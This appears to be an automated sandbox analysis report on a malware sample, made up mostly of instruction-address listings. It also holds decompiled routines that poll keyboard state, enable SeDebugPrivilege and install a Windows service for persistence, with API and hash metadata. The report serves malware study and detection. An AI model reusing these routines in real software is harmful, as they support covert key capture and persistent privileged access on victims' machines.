                                    0x24050f0b
                                    0x24050f33
                                    0x24050f3a
                                    0x24050f3f
                                    0x24050f42
                                    0x24050f45
                                    0x24050f4a
                                    0x24050f4d
                                    0x24050f4f
                                    0x24050f0d
                                    0x24050f0d
                                    0x24050f14
                                    0x24050f19
                                    0x24050f1c
                                    0x24050f1f
                                    0x24050f24
                                    0x24050f27
                                    0x24050f29
                                    0x24050f29
                                    0x24050ea9
                                    0x24050ea9
                                    0x24050eab
                                    0x24050eb0
                                    0x24050eb3
                                    0x24050edb
                                    0x24050ee2
                                    0x24050ee7
                                    0x24050eea
                                    0x24050eed
                                    0x24050ef2
                                    0x24050ef5
                                    0x24050ef7
                                    0x24050eb5
                                    0x24050eb5
                                    0x24050ebc
                                    0x24050ec1
                                    0x24050ec4
                                    0x24050ec7
                                    0x24050ecc
                                    0x24050ecf
                                    0x24050ed1
                                    0x24050ed1
                                    0x24050eb3
                                    0x24050e1e
                                    0x24050e1e
                                    0x24050e25
                                    0x24050e27
                                    0x24050e29
                                    0x24050e2e
                                    0x24050e33
                                    0x24050e35
                                    0x24050e3a
                                    0x24050e3e
                                    0x24050e6e
                                    0x24050e70
                                    0x24050e75
                                    0x24050e78
                                    0x24050e8b
                                    0x24050e8d
                                    0x24050e92
                                    0x24050e7a
                                    0x24050e7a
                                    0x24050e7c
                                    0x24050e81
                                    0x24050e81
                                    0x24050e40
                                    0x24050e40
                                    0x24050e42
                                    0x24050e47
                                    0x24050e4a
                                    0x24050e5d
                                    0x24050e5f
                                    0x24050e64
                                    0x24050e4c
                                    0x24050e4c
                                    0x24050e4e
                                    0x24050e53
                                    0x24050e53
                                    0x24050e4a
                                    0x24050e3e
                                    0x24050d90
                                    0x24050d90
                                    0x24050d97
                                    0x24050d99
                                    0x24050d9b
                                    0x24050da0
                                    0x24050da5
                                    0x24050da7
                                    0x24050dac
                                    0x24050db0
                                    0x24050de0
                                    0x24050de2
                                    0x24050de7
                                    0x24050dea
                                    0x24050dfd
                                    0x24050dff
                                    0x24050e04
                                    0x24050dec
                                    0x24050dec
                                    0x24050dee
                                    0x24050df3
                                    0x24050df3
                                    0x24050db2
                                    0x24050db2
                                    0x24050db4
                                    0x24050db9
                                    0x24050dbc
                                    0x24050dcf
                                    0x24050dd1
                                    0x24050dd6
                                    0x24050dbe
                                    0x24050dbe
                                    0x24050dc0
                                    0x24050dc5
                                    0x24050dc5
                                    0x24050dbc
                                    0x24050db0
                                    0x24050d02
                                    0x24050d02
                                    0x24050d09
                                    0x24050d0b
                                    0x24050d0d
                                    0x24050d12
                                    0x24050d17
                                    0x24050d19
                                    0x24050d1e
                                    0x24050d22
                                    0x24050d52
                                    0x24050d54
                                    0x24050d59
                                    0x24050d5c
                                    0x24050d6f
                                    0x24050d71
                                    0x24050d76
                                    0x24050d5e
                                    0x24050d5e
                                    0x24050d60
                                    0x24050d65
                                    0x24050d65
                                    0x24050d24
                                    0x24050d24
                                    0x24050d26
                                    0x24050d2b
                                    0x24050d2e
                                    0x24050d41
                                    0x24050d43
                                    0x24050d48
                                    0x24050d30
                                    0x24050d30
                                    0x24050d32
                                    0x24050d37
                                    0x24050d37
                                    0x24050d2e
                                    0x24050d22
                                    0x24050d00
                                    0x00000000
                                    0x00000000
                                    0x24051016
                                    0x24051018
                                    0x2405101d
                                    0x2405101f
                                    0x240512bc
                                    0x240512be
                                    0x240512c3
                                    0x240512c7
                                    0x24051339
                                    0x2405133b
                                    0x24051340
                                    0x24051343
                                    0x24051377
                                    0x24051381
                                    0x24051386
                                    0x2405138c
                                    0x24051392
                                    0x24051397
                                    0x2405139d
                                    0x2405139f
                                    0x24051345
                                    0x24051345
                                    0x2405134f
                                    0x24051354
                                    0x2405135a
                                    0x24051360
                                    0x24051365
                                    0x2405136b
                                    0x2405136d
                                    0x2405136d
                                    0x240512c9
                                    0x240512c9
                                    0x240512cb
                                    0x240512d0
                                    0x240512d3
                                    0x24051307
                                    0x24051311
                                    0x24051316
                                    0x2405131c
                                    0x24051322
                                    0x24051327
                                    0x2405132d
                                    0x2405132f
                                    0x240512d5
                                    0x240512d5
                                    0x240512df
                                    0x240512e4
                                    0x240512ea
                                    0x240512f0
                                    0x240512f5
                                    0x240512fb
                                    0x240512fd
                                    0x240512fd
                                    0x240512d3
                                    0x24051025
                                    0x24051025
                                    0x24051027
                                    0x2405102c
                                    0x2405102e
                                    0x24051033
                                    0x240510b3
                                    0x240510b5
                                    0x240510ba
                                    0x240510bc
                                    0x240510c1
                                    0x24051141
                                    0x24051143
                                    0x24051148
                                    0x2405114a
                                    0x2405114f
                                    0x240511cf
                                    0x240511d1
                                    0x240511d6
                                    0x240511da
                                    0x2405124c
                                    0x2405124e
                                    0x24051253
                                    0x24051256
                                    0x2405128a
                                    0x24051294
                                    0x24051299
                                    0x2405129f
                                    0x240512a5
                                    0x240512aa
                                    0x240512b0
                                    0x240512b2
                                    0x24051258
                                    0x24051258
                                    0x24051262
                                    0x24051267
                                    0x2405126d
                                    0x24051273
                                    0x24051278
                                    0x2405127e
                                    0x24051280
                                    0x24051280
                                    0x240511dc
                                    0x240511dc
                                    0x240511de
                                    0x240511e3
                                    0x240511e6
                                    0x2405121a
                                    0x24051224
                                    0x24051229
                                    0x2405122f
                                    0x24051235
                                    0x2405123a
                                    0x24051240
                                    0x24051242
                                    0x240511e8
                                    0x240511e8
                                    0x240511f2
                                    0x240511f7
                                    0x240511fd
                                    0x24051203
                                    0x24051208
                                    0x2405120e
                                    0x24051210
                                    0x24051210
                                    0x240511e6
                                    0x24051151
                                    0x24051151
                                    0x24051158
                                    0x2405115a
                                    0x2405115c
                                    0x24051161
                                    0x24051166
                                    0x24051168
                                    0x2405116d
                                    0x24051171
                                    0x240511a1
                                    0x240511a3
                                    0x240511a8
                                    0x240511ab
                                    0x240511be
                                    0x240511c0
                                    0x240511c5
                                    0x240511ad
                                    0x240511ad
                                    0x240511af
                                    0x240511b4
                                    0x240511b4
                                    0x24051173
                                    0x24051173
                                    0x24051175
                                    0x2405117a
                                    0x2405117d
                                    0x24051190
                                    0x24051192
                                    0x24051197
                                    0x2405117f
                                    0x2405117f
                                    0x24051181
                                    0x24051186
                                    0x24051186
                                    0x2405117d
                                    0x24051171
                                    0x240510c3
                                    0x240510c3
                                    0x240510ca
                                    0x240510cc
                                    0x240510ce
                                    0x240510d3
                                    0x240510d8
                                    0x240510da
                                    0x240510df
                                    0x240510e3
                                    0x24051113
                                    0x24051115
                                    0x2405111a
                                    0x2405111d
                                    0x24051130
                                    0x24051132
                                    0x24051137
                                    0x2405111f
                                    0x2405111f
                                    0x24051121
                                    0x24051126
                                    0x24051126
                                    0x240510e5
                                    0x240510e5
                                    0x240510e7
                                    0x240510ec
                                    0x240510ef
                                    0x24051102
                                    0x24051104
                                    0x24051109
                                    0x240510f1
                                    0x240510f1
                                    0x240510f3
                                    0x240510f8
                                    0x240510f8
                                    0x240510ef
                                    0x240510e3
                                    0x24051035
                                    0x24051035
                                    0x2405103c
                                    0x2405103e
                                    0x24051040
                                    0x24051045
                                    0x2405104a
                                    0x2405104c
                                    0x24051051
                                    0x24051055
                                    0x24051085
                                    0x24051087
                                    0x2405108c
                                    0x2405108f
                                    0x240510a2
                                    0x240510a4
                                    0x240510a9
                                    0x24051091
                                    0x24051091
                                    0x24051093
                                    0x24051098
                                    0x24051098
                                    0x24051057
                                    0x24051057
                                    0x24051059
                                    0x2405105e
                                    0x24051061
                                    0x24051074
                                    0x24051076
                                    0x2405107b
                                    0x24051063
                                    0x24051063
                                    0x24051065
                                    0x2405106a
                                    0x2405106a
                                    0x24051061
                                    0x24051055
                                    0x24051033
                                    0x00000000
                                    0x00000000
                                    0x240513a9
                                    0x240513ab
                                    0x240513b0
                                    0x240513b2
                                    0x240516dd
                                    0x240516df
                                    0x240516e4
                                    0x240516e8
                                    0x2405175a
                                    0x2405175c
                                    0x24051761
                                    0x24051764
                                    0x24051798
                                    0x240517a2
                                    0x240517a7
                                    0x240517ad
                                    0x240517b3
                                    0x240517b8
                                    0x240517be
                                    0x240517c0
                                    0x24051766
                                    0x24051766
                                    0x24051770
                                    0x24051775
                                    0x2405177b
                                    0x24051781
                                    0x24051786
                                    0x2405178c
                                    0x2405178e
                                    0x2405178e
                                    0x240516ea
                                    0x240516ea
                                    0x240516ec
                                    0x240516f1
                                    0x240516f4
                                    0x24051728
                                    0x24051732
                                    0x24051737
                                    0x2405173d
                                    0x24051743
                                    0x24051748
                                    0x2405174e
                                    0x24051750
                                    0x240516f6
                                    0x240516f6
                                    0x24051700
                                    0x24051705
                                    0x2405170b
                                    0x24051711
                                    0x24051716
                                    0x2405171c
                                    0x2405171e
                                    0x2405171e
                                    0x240516f4
                                    0x240513b8
                                    0x240513b8
                                    0x240513ba
                                    0x240513bf
                                    0x240513c1
                                    0x240513c6
                                    0x24051446
                                    0x24051448
                                    0x2405144d
                                    0x2405144f
                                    0x24051454
                                    0x240514d4
                                    0x240514d6
                                    0x240514db
                                    0x240514dd
                                    0x240514e2
                                    0x24051562
                                    0x24051564
                                    0x24051569
                                    0x2405156b
                                    0x24051570
                                    0x240515f0
                                    0x240515f2
                                    0x240515f7
                                    0x240515fb
                                    0x2405166d
                                    0x2405166f
                                    0x24051674
                                    0x24051677
                                    0x240516ab
                                    0x240516b5
                                    0x240516ba
                                    0x240516c0
                                    0x240516c6
                                    0x240516cb
                                    0x240516d1
                                    0x240516d3
                                    0x24051679
                                    0x24051679
                                    0x24051683
                                    0x24051688
                                    0x2405168e
                                    0x24051694
                                    0x24051699
                                    0x2405169f
                                    0x240516a1
                                    0x240516a1
                                    0x240515fd
                                    0x240515fd
                                    0x240515ff
                                    0x24051604
                                    0x24051607
                                    0x2405163b
                                    0x24051645
                                    0x2405164a
                                    0x24051650
                                    0x24051656
                                    0x2405165b
                                    0x24051661
                                    0x24051663
                                    0x24051609
                                    0x24051609
                                    0x24051613
                                    0x24051618
                                    0x2405161e
                                    0x24051624
                                    0x24051629
                                    0x2405162f
                                    0x24051631
                                    0x24051631
                                    0x24051607
                                    0x24051572
                                    0x24051572
                                    0x24051579
                                    0x2405157b
                                    0x2405157d
                                    0x24051582
                                    0x24051587
                                    0x24051589
                                    0x2405158e
                                    0x24051592
                                    0x240515c2
                                    0x240515c4
                                    0x240515c9
                                    0x240515cc
                                    0x240515df
                                    0x240515e1
                                    0x240515e6
                                    0x240515ce
                                    0x240515ce
                                    0x240515d0
                                    0x240515d5
                                    0x240515d5
                                    0x24051594
                                    0x24051594
                                    0x24051596
                                    0x2405159b
                                    0x2405159e
                                    0x240515b1
                                    0x240515b3
                                    0x240515b8
                                    0x240515a0
                                    0x240515a0
                                    0x240515a2
                                    0x240515a7
                                    0x240515a7
                                    0x2405159e
                                    0x24051592
                                    0x240514e4
                                    0x240514e4
                                    0x240514eb
                                    0x240514ed
                                    0x240514ef
                                    0x240514f4
                                    0x240514f9
                                    0x240514fb
                                    0x24051500
                                    0x24051504
                                    0x24051534
                                    0x24051536
                                    0x2405153b
                                    0x2405153e
                                    0x24051551
                                    0x24051553
                                    0x24051558
                                    0x24051540
                                    0x24051540
                                    0x24051542
                                    0x24051547
                                    0x24051547
                                    0x24051506
                                    0x24051506
                                    0x24051508
                                    0x2405150d
                                    0x24051510
                                    0x24051523
                                    0x24051525
                                    0x2405152a
                                    0x24051512
                                    0x24051512
                                    0x24051514
                                    0x24051519
                                    0x24051519
                                    0x24051510
                                    0x24051504
                                    0x24051456
                                    0x24051456
                                    0x2405145d
                                    0x2405145f
                                    0x24051461
                                    0x24051466
                                    0x2405146b
                                    0x2405146d
                                    0x24051472
                                    0x24051476
                                    0x240514a6
                                    0x240514a8
                                    0x240514ad
                                    0x240514b0
                                    0x240514c3
                                    0x240514c5
                                    0x240514ca
                                    0x240514b2
                                    0x240514b2
                                    0x240514b4
                                    0x240514b9
                                    0x240514b9
                                    0x24051478
                                    0x24051478
                                    0x2405147a
                                    0x2405147f
                                    0x24051482
                                    0x24051495
                                    0x24051497
                                    0x2405149c
                                    0x24051484
                                    0x24051484
                                    0x24051486
                                    0x2405148b
                                    0x2405148b
                                    0x24051482
                                    0x24051476
                                    0x240513c8
                                    0x240513c8
                                    0x240513cf
                                    0x240513d1
                                    0x240513d3
                                    0x240513d8
                                    0x240513dd
                                    0x240513df
                                    0x240513e4
                                    0x240513e8
                                    0x24051418
                                    0x2405141a
                                    0x2405141f
                                    0x24051422
                                    0x24051435
                                    0x24051437
                                    0x2405143c
                                    0x24051424
                                    0x24051424
                                    0x24051426
                                    0x2405142b
                                    0x2405142b
                                    0x240513ea
                                    0x240513ea
                                    0x240513ec
                                    0x240513f1
                                    0x240513f4
                                    0x24051407
                                    0x24051409
                                    0x2405140e
                                    0x240513f6
                                    0x240513f6
                                    0x240513f8
                                    0x240513fd
                                    0x240513fd
                                    0x240513f4
                                    0x240513e8
                                    0x240513c6
                                    0x00000000
                                    0x00000000
                                    0x240517ca
                                    0x240517cc
                                    0x240517d1
                                    0x240517d3
                                    0x24051a70
                                    0x24051a72
                                    0x24051a77
                                    0x24051a7b
                                    0x24051aed
                                    0x24051aef
                                    0x24051af4
                                    0x24051af7
                                    0x24051b2b
                                    0x24051b35
                                    0x24051b3a
                                    0x24051b40
                                    0x24051b46
                                    0x24051b4b
                                    0x24051b51
                                    0x24051b53
                                    0x24051af9
                                    0x24051af9
                                    0x24051b03
                                    0x24051b08
                                    0x24051b0e
                                    0x24051b14
                                    0x24051b19
                                    0x24051b1f
                                    0x24051b21
                                    0x24051b21
                                    0x24051a7d
                                    0x24051a7d
                                    0x24051a7f
                                    0x24051a84
                                    0x24051a87
                                    0x24051abb
                                    0x24051ac5
                                    0x24051aca
                                    0x24051ad0
                                    0x24051ad6
                                    0x24051adb
                                    0x24051ae1
                                    0x24051ae3
                                    0x24051a89
                                    0x24051a89
                                    0x24051a93
                                    0x24051a98
                                    0x24051a9e
                                    0x24051aa4
                                    0x24051aa9
                                    0x24051aaf
                                    0x24051ab1
                                    0x24051ab1
                                    0x24051a87
                                    0x240517d9
                                    0x240517d9
                                    0x240517db
                                    0x240517e0
                                    0x240517e2
                                    0x240517e7
                                    0x24051867
                                    0x24051869
                                    0x2405186e
                                    0x24051870
                                    0x24051875
                                    0x240518f5
                                    0x240518f7
                                    0x240518fc
                                    0x240518fe
                                    0x24051903
                                    0x24051983
                                    0x24051985
                                    0x2405198a
                                    0x2405198e
                                    0x24051a00
                                    0x24051a02
                                    0x24051a07
                                    0x24051a0a
                                    0x24051a3e
                                    0x24051a48
                                    0x24051a4d
                                    0x24051a53
                                    0x24051a59
                                    0x24051a5e
                                    0x24051a64
                                    0x24051a66
                                    0x24051a0c
                                    0x24051a0c
                                    0x24051a16
                                    0x24051a1b
                                    0x24051a21
                                    0x24051a27
                                    0x24051a2c
                                    0x24051a32
                                    0x24051a34
                                    0x24051a34
                                    0x24051990
                                    0x24051990
                                    0x24051992
                                    0x24051997
                                    0x2405199a
                                    0x240519ce
                                    0x240519d8
                                    0x240519dd
                                    0x240519e3
                                    0x240519e9
                                    0x240519ee
                                    0x240519f4
                                    0x240519f6
                                    0x2405199c
                                    0x2405199c
                                    0x240519a6
                                    0x240519ab
                                    0x240519b1
                                    0x240519b7
                                    0x240519bc
                                    0x240519c2
                                    0x240519c4
                                    0x240519c4
                                    0x2405199a
                                    0x24051905
                                    0x24051905
                                    0x2405190c
                                    0x2405190e
                                    0x24051910
                                    0x24051915
                                    0x2405191a
                                    0x2405191c
                                    0x24051921
                                    0x24051925
                                    0x24051955
                                    0x24051957
                                    0x2405195c
                                    0x2405195f
                                    0x24051972
                                    0x24051974
                                    0x24051979
                                    0x24051961
                                    0x24051961
                                    0x24051963
                                    0x24051968
                                    0x24051968
                                    0x24051927
                                    0x24051927
                                    0x24051929
                                    0x2405192e
                                    0x24051931
                                    0x24051944
                                    0x24051946
                                    0x2405194b
                                    0x24051933
                                    0x24051933
                                    0x24051935
                                    0x2405193a
                                    0x2405193a
                                    0x24051931
                                    0x24051925
                                    0x24051877
                                    0x24051877
                                    0x2405187e
                                    0x24051880
                                    0x24051882
                                    0x24051887
                                    0x2405188c
                                    0x2405188e
                                    0x24051893
                                    0x24051897
                                    0x240518c7
                                    0x240518c9
                                    0x240518ce
                                    0x240518d1
                                    0x240518e4
                                    0x240518e6
                                    0x240518eb
                                    0x240518d3
                                    0x240518d3
                                    0x240518d5
                                    0x240518da
                                    0x240518da
                                    0x24051899
                                    0x24051899
                                    0x2405189b
                                    0x240518a0
                                    0x240518a3
                                    0x240518b6
                                    0x240518b8
                                    0x240518bd
                                    0x240518a5
                                    0x240518a5
                                    0x240518a7
                                    0x240518ac
                                    0x240518ac
                                    0x240518a3
                                    0x24051897
                                    0x240517e9
                                    0x240517e9
                                    0x240517f0
                                    0x240517f2
                                    0x240517f4
                                    0x240517f9
                                    0x240517fe
                                    0x24051800
                                    0x24051805
                                    0x24051809
                                    0x24051839
                                    0x2405183b
                                    0x24051840
                                    0x24051843
                                    0x24051856
                                    0x24051858
                                    0x2405185d
                                    0x24051845
                                    0x24051845
                                    0x24051847
                                    0x2405184c
                                    0x2405184c
                                    0x2405180b
                                    0x2405180b
                                    0x2405180d
                                    0x24051812
                                    0x24051815
                                    0x24051828
                                    0x2405182a
                                    0x2405182f
                                    0x24051817
                                    0x24051817
                                    0x24051819
                                    0x2405181e
                                    0x2405181e
                                    0x24051815
                                    0x24051809
                                    0x240517e7
                                    0x00000000
                                    0x00000000
                                    0x240504f1
                                    0x240504f3
                                    0x240504f8
                                    0x240504fc
                                    0x24050574
                                    0x24050579
                                    0x2405057c
                                    0x240505b4
                                    0x240505b9
                                    0x240505bb
                                    0x240505c3
                                    0x240505c8
                                    0x240505ca
                                    0x240505cf
                                    0x240505dc
                                    0x240505dc
                                    0x240505cf
                                    0x2405057e
                                    0x24050580
                                    0x24050585
                                    0x24050587
                                    0x2405058f
                                    0x24050594
                                    0x24050596
                                    0x2405059b
                                    0x240505a8
                                    0x240505a8
                                    0x2405059b
                                    0x24050587
                                    0x240504fe
                                    0x24050500
                                    0x24050505
                                    0x24050508
                                    0x24050540
                                    0x24050545
                                    0x24050547
                                    0x2405054f
                                    0x24050554
                                    0x24050556
                                    0x2405055b
                                    0x24050568
                                    0x24050568
                                    0x2405055b
                                    0x2405050a
                                    0x2405050c
                                    0x24050511
                                    0x24050513
                                    0x2405051b
                                    0x24050520
                                    0x24050522
                                    0x24050527
                                    0x24050534
                                    0x24050534
                                    0x24050527
                                    0x24050513
                                    0x24050508
                                    0x00000000
                                    0x240504fc
                                    0x240503ea
                                    0x240503f5
                                    0x2405046d
                                    0x24050472
                                    0x24050475
                                    0x240504ad
                                    0x240504b2
                                    0x240504b4
                                    0x240504bc
                                    0x240504c1
                                    0x240504c3
                                    0x240504c8
                                    0x240504d5
                                    0x240504d5
                                    0x240504c8
                                    0x24050477
                                    0x24050479
                                    0x2405047e
                                    0x24050480
                                    0x24050488
                                    0x2405048d
                                    0x2405048f
                                    0x24050494
                                    0x240504a1
                                    0x240504a1
                                    0x24050494
                                    0x24050480
                                    0x240503f7
                                    0x24050401
                                    0x24050439
                                    0x2405043e
                                    0x24050440
                                    0x24050448
                                    0x2405044d
                                    0x2405044f
                                    0x24050454
                                    0x24050461
                                    0x24050461
                                    0x24050454
                                    0x24050403
                                    0x2405040c
                                    0x2405042d
                                    0x2405042d
                                    0x2405040c
                                    0x24050401
                                    0x240503f5
                                    0x24051c3f
                                    0x24051c3f
                                    0x24051c40
                                    0x24051c45
                                    0x24051c54
                                    0x24051c63
                                    0x24051c73
                                    0x24051c78
                                    0x24051ca4
                                    0x24051cac
                                    0x24051cbc
                                    0x24051cc1
                                    0x24051ced
                                    0x24051cf5
                                    0x24051d05
                                    0x24051d0a
                                    0x24051d33
                                    0x24051d3b
                                    0x24051d4b
                                    0x24051d50
                                    0x24051d62
                                    0x24051d62
                                    0x24051d0c
                                    0x24051d1c
                                    0x24051d1c
                                    0x24051cc3
                                    0x24051cd3
                                    0x24051cd3
                                    0x24051c7a
                                    0x24051c8a
                                    0x24051c8a
                                    0x24051d74
                                    0x24051d76
                                    0x24051d76
                                    0x24051d7f
                                    0x24051d82
                                    0x24051d85
                                    0x24051d9a
                                    0x24051d9a
                                    0x24051c45
                                    0x24050394
                                    0x24050394
                                    0x24050396
                                    0x24050398
                                    0x24050399
                                    0x00000000
                                    0x2405039b
                                    0x240503a5
                                    0x240503a6
                                    0x240503ab
                                    0x240503ae
                                    0x240503b8
                                    0x240503bd
                                    0x240503bf
                                    0x00000000
                                    0x240503bf

                                    APIs
                                    • GetAsyncKeyState.USER32(00000008), ref: 240503C9
                                    • GetKeyState.USER32(00000014), ref: 240503EC
                                    • GetKeyState.USER32(00000010), ref: 240503F9
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: State$Async
                                    • String ID:
                                    • API String ID: 993286747-0
                                    • Opcode ID: a838a1ded916f1e9fa18c54a896cb45272f7852ae25434eae39dbc2e0e99ddbd
                                    • Instruction ID: 2c685fa8047264c46bc5bbd45440302d312ea74eec7b0dd389396ce74b99bb26
                                    • Opcode Fuzzy Hash: a838a1ded916f1e9fa18c54a896cb45272f7852ae25434eae39dbc2e0e99ddbd
                                    • Instruction Fuzzy Hash: C8B15234B042458BFB12E769C844B9DB7E2FF59308F5088A0D4489F26DDEB6DDC24B56
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2403C424, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 71COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 82%
                                    			E2403C424() {
				void* _v8;
				long _v12;
				intOrPtr _v16;
				struct _TOKEN_PRIVILEGES _v28;
				struct _OSVERSIONINFOA _v176;
				int _t20;
				intOrPtr _t42;
				intOrPtr _t44;

				_v176.dwOSVersionInfoSize = 0x94;
				_t20 = GetVersionExA( &_v176);
				if(_v176.dwPlatformId != 1) {
					_push(0x2403c4e9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t44;
					OpenProcessToken(GetCurrentProcess(), 0x20,  &_v8);
					LookupPrivilegeValueA(0, "SeDebugPrivilege",  &(_v28.Privileges));
					_v28.PrivilegeCount = 1;
					_v16 = 2;
					_v12 = 0;
					AdjustTokenPrivileges(_v8, 0,  &_v28, 0, 0,  &_v12);
					_v28.PrivilegeCount = 1;
					_v16 = 2;
					_v12 = 0;
					AdjustTokenPrivileges(_v8, 0,  &_v28, 0, 0,  &_v12);
					CloseHandle(_v8);
					_pop(_t42);
					 *[fs:eax] = _t42;
					return 0;
				}
				return _t20;
			}











                                    0x2403c430
                                    0x2403c441
                                    0x2403c44d
                                    0x2403c456
                                    0x2403c45b
                                    0x2403c45e
                                    0x2403c46d
                                    0x2403c480
                                    0x2403c485
                                    0x2403c48c
                                    0x2403c495
                                    0x2403c4aa
                                    0x2403c4af
                                    0x2403c4b6
                                    0x2403c4bf
                                    0x2403c4d1
                                    0x2403c4da
                                    0x2403c4e1
                                    0x2403c4e4
                                    0x00000000
                                    0x2403c4e4
                                    0x2403c4f9

                                    APIs
                                    • GetVersionExA.KERNEL32(?), ref: 2403C441
                                    • GetCurrentProcess.KERNEL32(00000020,?,00000000,2403C4E9,?,?), ref: 2403C467
                                    • OpenProcessToken.ADVAPI32(00000000,00000020,?,00000000,2403C4E9,?,?), ref: 2403C46D
                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 2403C480
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,?,00000000,SeDebugPrivilege,?,00000000,00000020,?,00000000,2403C4E9,?,?), ref: 2403C4AA
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,?,?,00000000,?,00000000,00000000,?,00000000,SeDebugPrivilege,?,00000000), ref: 2403C4D1
                                    • CloseHandle.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,00000000,?,00000000,00000000,?,00000000,SeDebugPrivilege,?), ref: 2403C4DA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Token$AdjustPrivilegesProcess$CloseCurrentHandleLookupOpenPrivilegeValueVersion
                                    • String ID: SeDebugPrivilege
                                    • API String ID: 3222167619-2896544425
                                    • Opcode ID: 16bedd5ea4ee261e15105d6e64dc6c810e6a1000a1a3c6b406681dba4d588530
                                    • Instruction ID: ef2608eea441c924704e64c8cd83490a832fdc21d92cac562fa7b4a9731b7c2e
                                    • Opcode Fuzzy Hash: 16bedd5ea4ee261e15105d6e64dc6c810e6a1000a1a3c6b406681dba4d588530
                                    • Instruction Fuzzy Hash: 372133B2A04208BEFB10CBE5DD85FEFBFFCEB05704F504465E608E6184D6755A848BA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2403CBE4, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 98serviceCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 51%
                                    			E2403CBE4(char* __eax, void* __ebx, char __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				void* _t32;
				void* _t50;
				intOrPtr _t59;
				intOrPtr _t67;
				char* _t71;
				intOrPtr _t73;
				intOrPtr _t74;

				_t73 = _t74;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_v12 = __ecx;
				_v8 = __edx;
				_t71 = __eax;
				E24013524(_v12);
				_push(_t73);
				_push(0x2403cd0f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				_v16 = 0;
				E2403C424();
				_t50 = OpenSCManagerA(0, 0, 0xf003f);
				_t76 = _t50;
				if(_t50 != 0) {
					_push(_t73);
					_push(0x2403ccd4);
					_push( *[fs:edx]);
					 *[fs:edx] = _t74;
					_t32 = CreateServiceA(_t50, _t71, _t71, 0xf01ff, 0x110, 2, 0, E24013534(_v12), 0, 0, 0, 0, 0);
					E24013274( &_v20, _v8);
					E24013274( &_v32, _t71);
					E24013388( &_v28, _v32, "System\\CurrentControlSet\\Services\\");
					E24013274( &_v24, E24013534(_v28));
					E24016858(0x80000002, _t50, "Description", _v24, _t71, _t76, _v20);
					CloseServiceHandle(_t32);
					CloseServiceHandle(_t50);
					_pop(_t67);
					 *[fs:eax] = _t67;
					_v16 = 0xffffffff;
				}
				_pop(_t59);
				 *[fs:eax] = _t59;
				_push(0x2403cd16);
				E240130AC( &_v32, 4);
				return E24013088( &_v12);
			}

















                                    0x2403cbe5
                                    0x2403cbe7
                                    0x2403cbe9
                                    0x2403cbeb
                                    0x2403cbed
                                    0x2403cbef
                                    0x2403cbf1
                                    0x2403cbf3
                                    0x2403cbf8
                                    0x2403cbfb
                                    0x2403cbfe
                                    0x2403cc03
                                    0x2403cc0a
                                    0x2403cc0b
                                    0x2403cc10
                                    0x2403cc13
                                    0x2403cc18
                                    0x2403cc1b
                                    0x2403cc2e
                                    0x2403cc30
                                    0x2403cc32
                                    0x2403cc3a
                                    0x2403cc3b
                                    0x2403cc40
                                    0x2403cc43
                                    0x2403cc6a
                                    0x2403cc77
                                    0x2403cc85
                                    0x2403cc95
                                    0x2403cca7
                                    0x2403ccb9
                                    0x2403ccbf
                                    0x2403ccc5
                                    0x2403cccc
                                    0x2403cccf
                                    0x2403cce5
                                    0x2403cce5
                                    0x2403ccee
                                    0x2403ccf1
                                    0x2403ccf4
                                    0x2403cd01
                                    0x2403cd0e

                                    APIs
                                      • Part of subcall function 2403C424: GetVersionExA.KERNEL32(?), ref: 2403C441
                                      • Part of subcall function 2403C424: GetCurrentProcess.KERNEL32(00000020,?,00000000,2403C4E9,?,?), ref: 2403C467
                                      • Part of subcall function 2403C424: OpenProcessToken.ADVAPI32(00000000,00000020,?,00000000,2403C4E9,?,?), ref: 2403C46D
                                      • Part of subcall function 2403C424: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 2403C480
                                      • Part of subcall function 2403C424: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,?,00000000,SeDebugPrivilege,?,00000000,00000020,?,00000000,2403C4E9,?,?), ref: 2403C4AA
                                      • Part of subcall function 2403C424: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,?,?,00000000,?,00000000,00000000,?,00000000,SeDebugPrivilege,?,00000000), ref: 2403C4D1
                                      • Part of subcall function 2403C424: CloseHandle.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,00000000,?,00000000,00000000,?,00000000,SeDebugPrivilege,?), ref: 2403C4DA
                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,2403CD0F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 2403CC29
                                    • CreateServiceA.ADVAPI32(00000000,?,?,000F01FF,00000110,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,2403CCD4), ref: 2403CC6A
                                      • Part of subcall function 24016858: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 2401689E
